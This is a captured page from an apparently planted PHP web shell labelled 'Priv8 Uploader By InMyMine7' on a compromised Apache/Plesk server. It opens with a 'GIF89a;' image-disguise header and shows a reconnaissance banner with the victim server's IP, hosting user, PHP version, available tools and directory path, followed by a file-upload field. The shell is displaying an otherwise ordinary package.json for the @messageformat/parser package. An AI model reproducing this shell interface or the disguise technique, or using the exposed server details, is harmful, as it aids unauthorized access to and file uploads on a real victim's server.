GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.217.79 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.25 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/emdash.nr7.net/node_modules/@messageformat/parser/ |
Upload File : |
{
"name": "@messageformat/parser",
"version": "5.1.1",
"description": "An AST parser for ICU MessageFormat strings",
"keywords": [
"icu",
"messageformat",
"parser"
],
"contributors": [
"Alex Sexton <alexsexton@gmail.com>",
"Eemeli Aro <eemeli@gmail.com>",
"Nikola Kovacs <nikola.kovacs@gmail.com>",
"Adrian Vogelsgesang <adrian.vogelsgesang@tum.de>"
],
"license": "MIT",
"homepage": "http://messageformat.github.io/messageformat/api/parser/",
"repository": {
"type": "git",
"url": "git+https://github.com/messageformat/messageformat.git",
"directory": "packages/parser"
},
"type": "commonjs",
"main": "lib/parser.js",
"files": [
"lib/",
"codemod-fix-backslash-escapes.js"
],
"exports": {
".": "./lib/parser.js",
"./package.json": "./package.json"
},
"dependencies": {
"moo": "^0.5.1"
},
"scripts": {
"build": "tsc --project tsconfig.build.json",
"extract-api": "api-extractor run --verbose"
}
}